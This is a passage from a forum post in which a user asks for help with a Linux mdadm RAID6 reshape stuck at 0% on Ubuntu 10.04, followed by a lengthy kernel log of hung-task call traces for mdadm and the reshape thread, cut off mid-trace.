[ 1 ] sdg1 [ 4 ] sdf1 [ 7 ] sde1 [ 6 ] sdd1 [ 0 ] sdc1 [ 5 ] 2929683456 blocks super 1.2 level 6 , 1024k chunk , algorithm 2 [ 7/6 ] [ uu_uuuu ] [ > ... ... ... ... ... ... .. ] reshape = 0.0 % ( 37888/976561152 ) finish=567604147.2min speed=0k/sec i 've already tried mdadm 2.6.7 , 3.1.4 and 3.2 - nothing helps . did i lose my data again ? any suggestions on how can i make this work ? os is ubuntu server 10.04.2 . ps . needless to say , the data is inaccessible - i can not mount /dev/md0 to save the most valuable data . you can see my disappointment - the very specific thing i was excited about failed twice taking 5tb of my data with it . update : it appears there is some nice info in kern.log : 21:38:48 ... : [ 166.522055 ] raid5 : reshape will continue 21:38:48 ... : [ 166.522085 ] raid5 : device sdb1 operational as raid disk 1 21:38:48 ... : [ 166.522091 ] raid5 : device sdg1 operational as raid disk 4 21:38:48 ... : [ 166.522097 ] raid5 : device sdf1 operational as raid disk 5 21:38:48 ... : [ 166.522102 ] raid5 : device sde1 operational as raid disk 6 21:38:48 ... : [ 166.522107 ] raid5 : device sdd1 operational as raid disk 0 21:38:48 ... : [ 166.522111 ] raid5 : device sdc1 operational as raid disk 3 21:38:48 ... : [ 166.523942 ] raid5 : allocated 7438kb for md0 21:38:48 ... : [ 166.524041 ] 1 : w=1 pa=2 pr=5 m=2 a=2 r=7 op1=0 op2=0 21:38:48 ... : [ 166.524050 ] 4 : w=2 pa=2 pr=5 m=2 a=2 r=7 op1=0 op2=0 21:38:48 ... : [ 166.524056 ] 5 : w=3 pa=2 pr=5 m=2 a=2 r=7 op1=0 op2=0 21:38:48 ... : [ 166.524062 ] 6 : w=4 pa=2 pr=5 m=2 a=2 r=7 op1=0 op2=0 21:38:48 ... : [ 166.524068 ] 0 : w=5 pa=2 pr=5 m=2 a=2 r=7 op1=0 op2=0 21:38:48 ... : [ 166.524073 ] 3 : w=6 pa=2 pr=5 m=2 a=2 r=7 op1=0 op2=0 21:38:48 ... : [ 166.524079 ] raid5 : raid level 6 set md0 active with 6 out of 7 devices , algorithm 2 21:38:48 ... : [ 166.524519 ] raid5 conf printout : 21:38:48 ... : [ 166.524523 ] -- - rd:7 wd:6 21:38:48 ... : [ 166.524528 ] disk 0 , o:1 , dev : sdd1 21:38:48 ... : [ 166.524532 ] disk 1 , o:1 , dev : sdb1 21:38:48 ... : [ 166.524537 ] disk 3 , o:1 , dev : sdc1 21:38:48 ... : [ 166.524541 ] disk 4 , o:1 , dev : sdg1 21:38:48 ... : [ 166.524545 ] disk 5 , o:1 , dev : sdf1 21:38:48 ... : [ 166.524550 ] disk 6 , o:1 , dev : sde1 21:38:48 ... : [ 166.524553 ] ... ok start reshape thread 21:38:48 ... : [ 166.524727 ] md0 : detected capacity change from 0 to 2999995858944 21:38:48 ... : [ 166.524735 ] md : reshape of raid array md0 21:38:48 ... : [ 166.524740 ] md : minimum _guaranteed_ speed : 1000 kb/sec/disk . 21:38:48 ... : [ 166.524745 ] md : using maximum available idle io bandwidth ( but not more than 200000 kb/sec ) for reshape . 21:38:48 ... : [ 166.524756 ] md : using 128k window , over a total of 976561152 blocks . 21:39:05 ... : [ 166.525013 ] md0 : 21:42:04 ... : [ 362.520063 ] info : task mdadm:1937 blocked for more than 120 seconds . 21:42:04 ... : [ 362.520068 ] `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message . 21:42:04 ... : [ 362.520073 ] mdadm d 00000000ffffffff 0 1937 1 0x00000000 21:42:04 ... : [ 362.520083 ] ffff88002ef4f5d8 0000000000000082 0000000000015bc0 0000000000015bc0 21:42:04 ... : [ 362.520092 ] ffff88002eb5b198 ffff88002ef4ffd8 0000000000015bc0 ffff88002eb5ade0 21:42:04 ... : [ 362.520100 ] 0000000000015bc0 ffff88002ef4ffd8 0000000000015bc0 ffff88002eb5b198 21:42:04 ... : [ 362.520107 ] call trace : 21:42:04 ... : [ 362.520133 ] [ < ffffffffa0224892 > ] get_active_stripe+0x312/0x3f0 [ raid456 ] 21:42:04 ... : [ 362.520148 ] [ < ffffffff81059ae0 > ] ? default_wake_function+0x0/0x20 21:42:04 ... : [ 362.520159 ] [ < ffffffffa0228413 > ] make_request+0x243/0x4b0 [ raid456 ] 21:42:04 ... : [ 362.520169 ] [ < ffffffffa0221a90 > ] ? release_stripe+0x50/0x70 [ raid456 ] 21:42:04 ... : [ 362.520179 ] [ < ffffffff81084790 > ] ? autoremove_wake_function+0x0/0x40 21:42:04 ... : [ 362.520188 ] [ < ffffffff81414df0 > ] md_make_request+0xc0/0x130 21:42:04 ... : [ 362.520194 ] [ < ffffffff81414df0 > ] ? md_make_request+0xc0/0x130 21:42:04 ... : [ 362.520205 ] [ < ffffffff8129f8c1 > ] generic_make_request+0x1b1/0x4f0 21:42:04 ... : [ 362.520214 ] [ < ffffffff810f6515 > ] ? mempool_alloc_slab+0x15/0x20 21:42:04 ... : [ 362.520222 ] [ < ffffffff8116c2ec > ] ? alloc_buffer_head+0x1c/0x60 21:42:04 ... : [ 362.520230 ] [ < ffffffff8129fc80 > ] submit_bio+0x80/0x110 21:42:04 ... : [ 362.520236 ] [ < ffffffff8116c849 > ] submit_bh+0xf9/0x140 21:42:04 ... : [ 362.520244 ] [ < ffffffff8116f124 > ] block_read_full_page+0x274/0x3b0 21:42:04 ... : [ 362.520251 ] [ < ffffffff81172c90 > ] ? blkdev_get_block+0x0/0x70 21:42:04 ... : [ 362.520258 ] [ < ffffffff8110d875 > ] ? __inc_zone_page_state+0x35/0x40 21:42:04 ... : [ 362.520265 ] [ < ffffffff810f46d8 > ] ? add_to_page_cache_locked+0xe8/0x160 21:42:04 ... : [ 362.520272 ] [ < ffffffff81173d78 > ] blkdev_readpage+0x18/0x20 21:42:04 ... : [ 362.520279 ] [ < ffffffff810f484b > ] __read_cache_page+0x7b/0xe0 21:42:04 ... : [ 362.520285 ] [ < ffffffff81173d60 > ] ? blkdev_readpage+0x0/0x20 21:42:04 ... : [ 362.520290 ] [ < ffffffff81173d60 > ] ? blkdev_readpage+0x0/0x20 21:42:04 ... : [ 362.520297 ] [ < ffffffff810f57dc > ] do_read_cache_page+0x3c/0x120 21:42:04 ... : [ 362.520304 ] [ < ffffffff810f5909 > ] read_cache_page_async+0x19/0x20 21:42:04 ... : [ 362.520310 ] [ < ffffffff810f591e > ] read_cache_page+0xe/0x20 21:42:04 ... : [ 362.520317 ] [ < ffffffff811a6cb0 > ] read_dev_sector+0x30/0xa0 21:42:04 ... : [ 362.520324 ] [ < ffffffff811a7fcd > ] amiga_partition+0x6d/0x460 21:42:04 ... : [ 362.520331 ] [ < ffffffff811a7938 > ] check_partition+0x138/0x190 21:42:04 ... : [ 362.520338 ] [ < ffffffff811a7a7a > ] rescan_partitions+0xea/0x2f0 21:42:04 ... : [ 362.520344 ] [ < ffffffff811744c7 > ] __blkdev_get+0x267/0x3d0 21:42:04 ... : [ 362.520350 ] [ < ffffffff81174650 > ] ? blkdev_open+0x0/0xc0 21:42:04 ... : [ 362.520356 ] [ < ffffffff81174640 > ] blkdev_get+0x10/0x20 21:42:04 ... : [ 362.520362 ] [ < ffffffff811746c1 > ] blkdev_open+0x71/0xc0 21:42:04 ... : [ 362.520369 ] [ < ffffffff811419f3 > ] __dentry_open+0x113/0x370 21:42:04 ... : [ 362.520377 ] [ < ffffffff81253f8f > ] ? security_inode_permission+0x1f/0x30 21:42:04 ... : [ 362.520385 ] [ < ffffffff8114de3f > ] ? inode_permission+0xaf/0xd0 21:42:04 ... : [ 362.520391 ] [ < ffffffff81141d67 > ] nameidata_to_filp+0x57/0x70 21:42:04 ... : [ 362.520398 ] [ < ffffffff8115207a > ] do_filp_open+0x2da/0xba0 21:42:04 ... : [ 362.520406 ] [ < ffffffff811134a8 > ] ? unmap_vmas+0x178/0x310 21:42:04 ... : [ 362.520414 ] [ < ffffffff8115dbfa > ] ? alloc_fd+0x10a/0x150 21:42:04 ... : [ 362.520421 ] [ < ffffffff81141769 > ] do_sys_open+0x69/0x170 21:42:04 ... : [ 362.520428 ] [ < ffffffff811418b0 > ] sys_open+0x20/0x30 21:42:04 ... : [ 362.520437 ] [ < ffffffff810121b2 > ] system_call_fastpath+0x16/0x1b 21:42:04 ... : [ 362.520446 ] info : task mdadm:2283 blocked for more than 120 seconds . 21:42:04 ... : [ 362.520450 ] `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message . 21:42:04 ... : [ 362.520454 ] mdadm d 0000000000000000 0 2283 2212 0x00000000 21:42:04 ... : [ 362.520462 ] ffff88002cca7d98 0000000000000086 0000000000015bc0 0000000000015bc0 21:42:04 ... : [ 362.520470 ] ffff88002ededf78 ffff88002cca7fd8 0000000000015bc0 ffff88002ededbc0 21:42:04 ... : [ 362.520478 ] 0000000000015bc0 ffff88002cca7fd8 0000000000015bc0 ffff88002ededf78 21:42:04 ... : [ 362.520485 ] call trace : 21:42:04 ... : [ 362.520495 ] [ < ffffffff81543a97 > ] __mutex_lock_slowpath+0xf7/0x180 21:42:04 ... : [ 362.520502 ] [ < ffffffff8154397b > ] mutex_lock+0x2b/0x50 21:42:04 ... : [ 362.520508 ] [ < ffffffff8117404d > ] __blkdev_put+0x3d/0x190 21:42:04 ... : [ 362.520514 ] [ < ffffffff811741b0 > ] blkdev_put+0x10/0x20 21:42:04 ... : [ 362.520520 ] [ < ffffffff811741f3 > ] blkdev_close+0x33/0x60 21:42:04 ... : [ 362.520527 ] [ < ffffffff81145375 > ] __fput+0xf5/0x210 21:42:04 ... : [ 362.520534 ] [ < ffffffff811454b5 > ] fput+0x25/0x30 21:42:04 ... : [ 362.520540 ] [ < ffffffff811415ad > ] filp_close+0x5d/0x90 21:42:04 ... : [ 362.520546 ] [ < ffffffff81141697 > ] sys_close+0xb7/0x120 21:42:04 ... : [ 362.520553 ] [ < ffffffff810121b2 > ] system_call_fastpath+0x16/0x1b 21:42:04 ... : [ 362.520559 ] info : task md0_reshape:2287 blocked for more than 120 seconds . 21:42:04 ... : [ 362.520563 ] `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message . 21:42:04 ... : [ 362.520567 ] md0_reshape d ffff88003aee96f0 0 2287 2 0x00000000 21:42:04 ... : [ 362.520575 ] ffff88003cf05a70 0000000000000046 0000000000015bc0 0000000000015bc0 21:42:04 ... : [ 362.520582 ] ffff88003aee9aa8 ffff88003cf05fd8 0000000000015bc0 ffff88003aee96f0 21:42:04 ... : [ 362.520590 ] 0000000000015bc0 ffff88003cf05fd8 0000000000015bc0 ffff88003aee9aa8 21:42:04 ... : [ 362.520597 ] call trace : 21:42:04 ... : [ 362.520608 ] [ < ffffffffa0224892 > ] get_active_stripe+0x312/0x3f0 [ raid456 ] 21:42:04 ... : [ 362.520616 ] [ < ffffffff81059ae0 > ] ? default_wake_function+0x0/0x20 21:42:04 ... : [ 362.520626 ] [ < ffffffffa0226f80 > ] reshape_request+0x4c0/0x9a0 [ raid456 ] 21:42:04 ... : [ 362.520634 ] [ < ffffffff81084790 > ] ? autoremove_wake_function+0x0/0x40 21:42:04 ... : [ 362.520644 ] [ < ffffffffa022777a > ] sync_request+0x31a/0x3a0 [ raid456 ] 21:42:04 ... : [ 362.520651 ] [ < ffffffff81052713 > ] ? __wake_up+0x53/0x70 21:42:04 ... : [ 362.520658 ] [ < ffffffff814156b1 > ] md_do_sync+0x621/0xbb0 21:42:04 ... : [ 362.520668 ] [ < ffffffff810387b9 > ] ? default_spin_lock_flags+0x9/0x10 21:42:04 ... : [ 362.520675 ] [ < ffffffff8141640c > ] md_thread+0x5c/0x130 21:42:04 ... : [ 362.520681 ] [ < ffffffff81084790 > ] ? autoremove_wake_function+0x0/0x40 21:42:04 ... : [ 362.520688 ] [ < ffffffff814163b0 > ] ? md_thread+0x0/0x130 21:42:04 ... : [ 362.520694 ] [ < ffffffff81084416 > ] kthread+0x96/0xa0 21:42:04 ... : [ 362.520701 ] [ < ffffffff810131ea > ] child_rip+0xa/0x20 21:42:04 ... : [ 362.520707 ] [ < ffffffff81084380 > ] ? kthread+0x0/0xa0 21:42:04 ... : [ 362.520713 ] [ < ffffffff810131e0 > ] ? child_rip+0x0/0x20 21:42:04 ... : [ 362.520718 ] info : task mdadm:2288 blocked for more than 120 seconds . 21:42:04 ... : [ 362.520721 ] `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message . 21:42:04 ... : [ 362.520725 ] mdadm d 0000000000000000 0 2288 1 0x00000000 21:42:04 ... : [ 362.520733 ] ffff88002cca9c18 0000000000000086 0000000000015bc0 0000000000015bc0 21:42:04 ... : [ 362.520741 ] ffff88003aee83b8 ffff88002cca9fd8 0000000000015bc0 ffff88003aee8000 21:42:04 ... : [ 362.520748 ] 0000000000015bc0 ffff88002cca9fd8 0000000000015bc0 ffff88003aee83b8 21:42:04 ... : [ 362.520755 ] call trace : 21:42:04 ... : [ 362.520763 ] [ < ffffffff81543a97 > ] __mutex_lock_slowpath+0xf7/0x180 21:42:04 ... : [ 362.520771 ] [ < ffffffff812a6d50 > ] ? exact_match+0x0/0x10 21:42:04 ... : [ 362.520777 ] [ < ffffffff8154397b > ] mutex_lock+0x2b/0x50 21:42:04 ... : [ 362.520783 ] [ < ffffffff811742c8 > ] __blkdev_get+0x68/0x3d0 21:42:04 ... : [ 362.520790 ] [ < ffffffff81174650 > ] ? blkdev_open+0x0/0xc0 21:42:04 ... : [ 362.520795 ] [ < ffffffff81174640 > ] blkdev_get+0x10/0x20 21:42:04 ... : [ 362.520801 ] [ < ffffffff811746c1 > ] blkdev_open+0x71/0xc0 21:42:04 ... : [ 362.520808 ] [ < ffffffff811419f3 > ] __dentry_open+0x113/0x370 21:42:04 ... : [ 362.520815 ] [ < ffffffff81253f8f > ] ? security_inode_permission+0x1f/0x30 21:42:04 ... : [ 362.520821 ] [ < ffffffff8114de3f > ] ? inode_permission+0xaf/0xd0 21:42:04 ... : [ 362.520828 ] [ < ffffffff81141d67 > ] nameidata_to_filp+0x57/0x70 21:42:04 ... : [ 362.520834 ] [ < ffffffff8115207a > ] do_filp_open+0x2da/0xba0 21:42:04 ... : [ 362.520841 ] [ < ffffffff810ff0e1 > ] ? lru_cache_add_lru+0x21/0x40 21:42:04 ... : [ 362.520848 ] [ < ffffffff8111109c > ] ? do_anonymous_page+0x11c/0x330 21:42:04 ... : [ 362.520855 ] [ < ffffffff81115d5f > ] ? handle_mm_fault+0x31f/0x3c0 21:42:04 ... : [ 362.520862 ] [ < ffffffff8115dbfa > ] ? alloc_fd+0x10a/0x150 21:42:04 ... : [ 362.520868 ] [ < ffffffff81141769 > ] do_sys_open+0x69/0x170 21:42:04 ... : [ 362.520874 ] [ < ffffffff811418b0 > ] sys_open+0x20/0x30 21:42:04 ... : [ 362.520882 ] [ < ffffffff810121b2 > ] system_call_fastpath+0x16/0x1b 21:44:04 ... : [ 482.520065 ] info : task mdadm:1937 blocked for more than 120 seconds . 21:44:04 ... : [ 482.520071 ] `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message . 21:44:04 ... : [ 482.520077 ] mdadm d 00000000ffffffff 0 1937 1 0x00000000 21:44:04 ... : [ 482.520087 ] ffff88002ef4f5d8 0000000000000082 0000000000015bc0 0000000000015bc0 21:44:04 ... : [ 482.520096 ] ffff88002eb5b198 ffff88002ef4ffd8 0000000000015bc0 ffff88002eb5ade0 21:44:04 ... : [ 482.520104 ] 0000000000015bc0 ffff88002ef4ffd8 0000000000015bc0 ffff88002eb5b198 21:44:04 ... : [ 482.520112 ] call trace : 21:44:04 ... : [ 482.520139 ] [ < ffffffffa0224892 > ] get_active_stripe+0x312/0x3f0 [ raid456 ] 21:44:04 ... : [ 482.520154 ] [ < ffffffff81059ae0 > ] ? default_wake_function+0x0/0x20 21:44:04 ... : [ 482.520165 ] [ < ffffffffa0228413 > ] make_request+0x243/0x4b0 [ raid456 ] 21:44:04 ... : [ 482.520175 ] [ < ffffffffa0221a90 > ] ? release_stripe+0x50/0x70 [ raid456 ] 21:44:04 ... : [ 482.520185 ] [ < ffffffff81084790 > ] ? autoremove_wake_function+0x0/0x40 21:44:04 ... : [ 482.520194 ] [ < ffffffff81414df0 > ] md_make_request+0xc0/0x130 21:44:04 ... : [ 482.520201 ] [ < ffffffff81414df0 > ] ? md_make_request+0xc0/0x130 21:44:04 ... : [ 482.520212 ] [ < ffffffff8129f8c1 > ] generic_make_request+0x1b1/0x4f0 21:44:04 ... : [ 482.520221 ] [ < ffffffff810f6515 > ] ? mempool_alloc_slab+0x15/0x20 21:44:04 ... : [ 482.520229 ] [ < ffffffff8116c2ec > ] ? alloc_buffer_head+0x1c/0x60 21:44:04 ... : [ 482.520237 ] [ < ffffffff8129fc80 > ] submit_bio+0x80/0x110 21:44:04 ... : [ 482.520244 ] [ < ffffffff8116c849 > ] submit_bh+0xf9/0x140 21:44:04 ... : [ 482.520252 ] [ < ffffffff8116f124 > ] block_read_full_page+0x274/0x3b0 21:44:04 ... : [ 482.520258 ] [ < ffffffff81172c90 > ] ? blkdev_get_block+0x0/0x70 21:44:04 ... : [ 482.520266 ] [ < ffffffff8110d875 > ] ? __inc_zone_page_state+0x35/0x40 21:44:04 ... : [ 482.520273 ] [ < ffffffff810f46d8 > ] ? add_to_page_cache_locked+0xe8/0x160 21:44:04 ... : [ 482.520280 ] [ < ffffffff81173d78 > ] blkdev_readpage+0x18/0x20 21:44:04 ... : [ 482.520286 ] [ < ffffffff810f484b > ] __read_cache_page+0x7b/0xe0 21:44:04 ... : [ 482.520293 ] [ < ffffffff81173d60 > ] ? blkdev_readpage+0x0/0x20 21:44:04 ... : [ 482.520299 ] [ < ffffffff81173d60 > ] ? blkdev_readpage+0x0/0x20 21:44:04 ... : [ 482.520306 ] [ < ffffffff810f57dc > ] do_read_cache_page+0x3c/0x120 21:44:04 ... : [ 482.520313 ] [ < ffffffff810f5909 > ] read_cache_page_async+0x19/0x20 21:44:04 ... : [ 482.520319 ] [ < ffffffff810f591e > ] read_cache_page+0xe/0x20 21:44:04 ... : [ 482.520327 ] [ < ffffffff811a6cb0 > ] read_dev_sector+0x30/0xa0 21:44:04 ... : [ 482.520334 ] [ < ffffffff811a7fcd > ] amiga_partition+0x6d/0x460 21:44:04 ... : [ 482.520341 ] [ < ffffffff811a7938 > ] check_partition+0x138/0x190 21:44:04 ... : [ 482.520348 ] [ < ffffffff811a7a7a > ] rescan_partitions+0xea/0x2f0 21:44:04 ... : [ 482.520355 ] [ < ffffffff811744c7 > ] __blkdev_get+0x267/0x3d0 21:44:04 ... : [ 482.520361 ] [ < ffffffff81174650 > ] ? blkdev_open+0x0/0xc0 21:44:04 ... : [ 482.520367 ] [ < ffffffff81174640 > ] blkdev_get+0x10/0x20 21:44:04 ... : [ 482.520373 ] [ < ffffffff811746c1 > ] blkdev_open+0x71/0xc0 21:44:04 ... : [ 482.520380 ] [ < ffffffff811419f3 > ] __dentry_open+0x113/0x370 21:44:04 ... : [ 482.520388 ] [ < ffffffff81253f8f > ] ? security_inode_permission+0x1f/0x30 21:44:04 ... : [ 482.520396 ] [ < ffffffff8114de3f > ] ? inode_permission+0xaf/0xd0 21:44:04 ... : [ 482.520403 ] [ < ffffffff81141d67 > ] nameidata_to_filp+0x57/0x70 21:44:04 ... : [ 482.520410 ] [ < ffffffff8115207a > ] do_filp_open+0x2da/0xba0 21:44:04 ... : [ 482.520417 ] [ < ffffffff811134a8 > ] ? unmap_vmas+0x178/0x310 21:44:04 ... : [ 482.520426 ] [ < ffffffff8115dbfa > ] ? alloc_fd+0x10a/0x150 21:44:04 ... : [ 482.520432 ] [ < ffffffff81141769 > ] do_sys_open+0x69/0x170 21:44:04 ... : [ 482.520438 ] [ < ffffffff811418b0 > ] sys_open+0x20/0x30 21:44:04 ... : [ 482.520447 ] [ < ffffffff810121b2 > ] system_call_fastpath+0x16/0x1b 21:44:04 ... : [ 482.520458 ] info : task mdadm:2283 blocked for more than 120 seconds . 21:44:04 ... : [ 482.520462 ] `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message . 21:44:04 ... : [ 482.520467 ] mdadm d 0000000000000000 0 2283 2212 0x00000000 21:44:04 ... : [ 482.520475 ] ffff88002cca7d98 0000000000000086 0000000000015bc0 0000000000015bc0 21:44:04 ... : [ 482.520483 ] ffff88002ededf78 ffff88002cca7fd8 0000000000015bc0 ffff88002ededbc0 21:44:04 ... : [ 482.520490 ] 0000000000015bc0 ffff88002cca7fd8 0000000000015bc0 ffff88002ededf78 21:44:04 ... : [ 482.520498 ] call trace : 21:44:04 ... : [ 482.520508 ] [ < ffffffff81543a97 > ] __mutex_lock_slowpath+0xf7/0x180 21:44:04 ... : [ 482.520515 ] [ < ffffffff8154397b > ] mutex_lock+0x2b/0x50 21:44:04 ... : [ 482.520521 ] [ < ffffffff8117404d > ] __blkdev_put+0x3d/0x190 21:44:04 ... : [ 482.520527 ] [ < ffffffff811741b0 > ] blkdev_put+0x10/0x20 21:44:04 ... : [ 482.520533 ] [ < ffffffff811741f3 > ] blkdev_close+0x33/0x60 21:44:04 ... : [ 482.520541 ] [ < ffffffff81145375 > ] __fput+0xf5/0x210 21:44:04 ... : [ 482.520547 ] [ < ffffffff811454b5 > ] fput+0x25/0x30 21:44:04 ... : [ 482.520554 ] [ < ffffffff811415ad > ] filp_close+0x5d/0x90 21:44:04 ... : [ 482.520560 ] [ < ffffffff81141697 > ] sys_close+0xb7/0x120 21:44:04 ... : [ 482.520568 ] [ < ffffffff810121b2 > ] system_call_fastpath+0x16/0x1b 21:44:04 ... : [ 482.520574 ] info : task md0_reshape:2287 blocked for more than 120 seconds . 21:44:04 ... : [ 482.520578 ] `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message . 21:44:04 ... : [ 482.520582 ] md0_reshape d ffff88003aee96f0 0 2287 2 0x00000000 21:44:04 ... : [ 482.520590 ] ffff88003cf05a70 0000000000000046 0000000000015bc0 0000000000015bc0 21:44:04 ... : [ 482.520597 ] ffff88003aee9aa8 ffff88003cf05fd8 0000000000015bc0 ffff88003aee96f0 21:44:04 ... : [ 482.520605 ] 0000000000015bc0 ffff88003cf05fd8 0000000000015bc0 ffff88003aee9aa8 21:44:04 ... : [ 482.520612 ] call trace : 21:44:04 ... : [ 482.520623 ] [ < ffffffffa0224892 > ] get_active_stripe+0x312/0x3f0 [ raid456 ] 21:44:04 ... : [ 482.520633 ] [ < ffffffff81059ae0 > ] ? default_wake_function+0x0/0x20 21:44:04 ... : [ 482.520643 ] [ < ffffffffa0226f80 > ] reshape_request+0x4c0/0x9a0 [ raid456 ] 21:44:04 ... : [ 482.520651 ] [ < ffffffff81084790 > ] ? autoremove_wake_function+0x0/0x40 21:44:04 ... : [ 482.520661 ] [ < ffffffffa022777a > ] sync_request+0x31a/0x3a0 [ raid456 ] 21:44:04 ... : [ 482.520668 ] [ < ffffffff81052713 > ] ? __wake_up+0x53/0x70 21:44:04 ... : [ 482.520675 ] [ < ffffffff814156b1 > ] md_do_sync+0x621/0xbb0 21:44:04 ... : [ 482.520685 ] [ < ffffffff810387b9 > ] ? default_spin_lock_flags+0x9/0x10 21:44:04 ... : [ 482.520692 ] [ < ffffffff8141640c > ] md_thread+0x5c/0x130 21:44:04 ... : [ 482.520699 ] [ < ffffffff81084790 > ] ? autoremove_wake_function+0x0/0x40 21:44:04 ... : [ 482.520705 ] [ < ffffffff814163b0 > ] ? md_thread+0x0/0x130 21:44:04 ... : [ 482.520711 ] [ < ffffffff81084416 > ] kthread+0x96/0xa0 21:44:04 ... : [ 482.520718 ] [ < ffffffff810131ea > ] child_rip+0xa/0x20 21:44:04 ... : [ 482.520725 ] [ < ffffffff81084380 > ] ? kthread+0x0/0xa0 21:44:04 ... : [ 482.520730 ] [ < ffffffff810131e0 > ] ? child_rip+0x0/0x20 21:44:04 ... : [ 482.520735 ] info : task mdadm:2288 blocked for more than 120 seconds . 21:44:04 ... : [ 482.520739 ] `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message . 21:44:04 ... : [ 482.520743 ] mdadm d 0000000000000000 0 2288 1 0x00000000 21:44:04 ... : [ 482.520751 ] ffff88002cca9c18 0000000000000086 0000000000015bc0 0000000000015bc0 21:44:04 ... : [ 482.520759 ] ffff88003aee83b8 ffff88002cca9fd8 0000000000015bc0 ffff88003aee8000 21:44:04 ... : [ 482.520767 ] 0000000000015bc0 ffff88002cca9fd8 0000000000015bc0 ffff88003aee83b8 21:44:04 ... : [ 482.520774 ] call trace : 21:44:04 ... : [ 482.520782 ] [ < ffffffff81543a97 > ] __mutex_lock_slowpath+0xf7/0x180 21:44:04 ... : [ 482.520790 ] [ < ffffffff812a6d50 > ] ? exact_match+0x0/0x10 21:44:04 ... : [ 482.520797 ] [ < ffffffff8154397b > ] mutex_lock+0x2b/0x50 21:44:04 ... : [ 482.520804 ] [ < ffffffff811742c8 > ] __blkdev_get+0x68/0x3d0 21:44:04 ... : [ 482.520810 ] [ < ffffffff81174650 > ] ? blkdev_open+0x0/0xc0 21:44:04 ... : [ 482.520816 ] [ < ffffffff81174640 > ] blkdev_get+0x10/0x20 21:44:04 ... : [ 482.520822 ] [ < ffffffff811746c1 > ] blkdev_open+0x71/0xc0 21:44:04 ... : [ 482.520829 ] [ < ffffffff811419f3 > ] __dentry_open+0x113/0x370 21:44:04 ... : [ 482.520837 ] [ < ffffffff81253f8f > ] ? security_inode_permission+0x1f/0x30 21:44:04 ... : [ 482.520843 ] [ < ffffffff8114de3f > ] ? inode_permission+0xaf/0xd0 21:44:04 ... : [ 482.520850 ] [ < ffffffff81141d67 > ] nameidata_to_filp+0x57/0x70 21:44:04 ... : [ 482.520857 ] [ < ffffffff8115207a > ] do_filp_open+0x2da/0xba0 21:44:04 ... : [ 482.520864 ] [ < ffffffff810ff0e1 > ] ? lru_cache_add_lru+0x21/0x40 21:44:04 ... : [ 482.520871 ] [ < ffffffff8111109c > ] ? do_anonymous_page+0x11c/0x330 21:44:04 ... : [ 482.520878 ] [ < ffffffff81115d5f > ] ? handle_mm_fault+0x31f/0x3c0 21:44:04 ... : [ 482.520885 ] [ < ffffffff8115dbfa > ] ? alloc_fd+0x10a/0x150 21:44:04 ... : [ 482.520891 ] [ < ffffffff81141769 > ] do_sys_open+0x69/0x170 21:44:04 ... : [ 482.520897 ] [ < ffffffff811418b0 > ] sys_open+0x20/0x30 21:44:04 ... : [ 482.520905 ] [ < ffffffff810121b2 > ] system_call_fastpath+0x16/0x1b 21:46:04 ... : [ 602.520053 ] info : task mdadm:1937 blocked for more than 120 seconds . 21:46:04 ... : [ 602.520059 ] `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message . 21:46:04 ... : [ 602.520065 ] mdadm d 00000000ffffffff 0 1937 1 0x00000000 21:46:04 ... : [ 602.520075 ] ffff88002ef4f5d8 0000000000000082 0000000000015bc0 0000000000015bc0 21:46:04 ... : [ 602.520084 ] ffff88002eb5b198 ffff88002ef4ffd8 0000000000015bc0 ffff88002eb5ade0 21:46:04 ... : [ 602.520091 ] 0000000000015bc0 ffff88002ef4ffd8 0000000000015bc0 ffff88002eb5b198 21:46:04 ... : [ 602.520099 ] call trace : 21:46:04 ... : [ 602.520127 ] [ < ffffffffa0224892 > ] get_active_stripe+0x312/0x3f0 [ raid456 ] 21:46:04 ... : [ 602.520142 ] [ < ffffffff81059ae0 > ] ? default_wake_function+0x0/0x20 21:46:04 ... : [ 602.520153 ] [ < ffffffffa0228413 > ] make_request+0x243/0x4b0 [ raid456 ] 21:46:04 ... : [ 602.520162 ] [ < ffffffffa0221a90 > ] ? release_stripe+0x50/0x70 [ raid456 ] 21:46:04 ... : [ 602.520171 ] [ < ffffffff81084790 > ] ? autoremove_wake_function+0x0/0x40 21:46:04 ... : [ 602.520180 ] [ < ffffffff81414df0 > ] md_make_request+0xc0/0x130 21:46:04 ... : [ 602.520187 ] [ < ffffffff81414df0 > ] ? md_make_request+0xc0/0x130 21:46:04 ... : [ 602.520197 ] [ < ffffffff8129f8c1 > ] generic_make_request+0x1b1/0x4f0 21:46:04 ... : [ 602.520206 ] [ < ffffffff810f6515 > ] ? mempool_alloc_slab+0x15/0x20 21:46:04 ... : [ 602.520215 ] [ < ffffffff8116c2ec > ] ? alloc_buffer_head+0x1c/0x60 21:46:04 ... : [ 602.520222 ] [ < ffffffff8129fc80 > ] submit_bio+0x80/0x110 21:46:04 ... : [ 602.520229 ] [ < ffffffff8116c849 > ] submit_bh+0xf9/0x140 21:46:04 ... : [ 602.520237 ] [ < ffffffff8116f124 > ] block_read_full_page+0x274/0x3b0 21:46:04 ... : [ 602.520244 ] [ < ffffffff81172c90 > ] ? blkdev_get_block+0x0/0x70 21:46:04 ... : [ 602.520252 ] [ < ffffffff8110d875 > ] ? __inc_zone_page_state+0x35/0x40 21:46:04 ... : [ 602.520259 ] [ < ffffffff810f46d8 > ] ? add_to_page_cache_locked+0xe8/0x160 21:46:04 ... : [ 602.520266 ] [ < ffffffff81173d78 > ] blkdev_readpage+0x18/0x20 21:46:04 ... : [ 602.520273 ] [ < ffffffff810f484b > ] __read_cache_page+0x7b/0xe0 21:46:04 ... : [ 602.520279 ] [ < ffffffff81173d60 > ] ? blkdev_readpage+0x0/0x20 21:46:04 ... : [ 602.520285 ] [ < ffffffff81173d60 > ] ? blkdev_readpage+0x0/0x20 21:46:04 ... : [ 602.520292 ] [ < ffffffff810f57dc > ] do_read_cache_page+0x3c/0x120 21:46:04 ... : [ 602.520300 ] [ < ffffffff810f5909 > ] read_cache_page_async+0x19/0x20 21:46:04 ... : [ 602.520306 ] [ < ffffffff810f591e > ] read_cache_page+0xe/0x20 21:46:04 ... : [ 602.520314 ] [ < 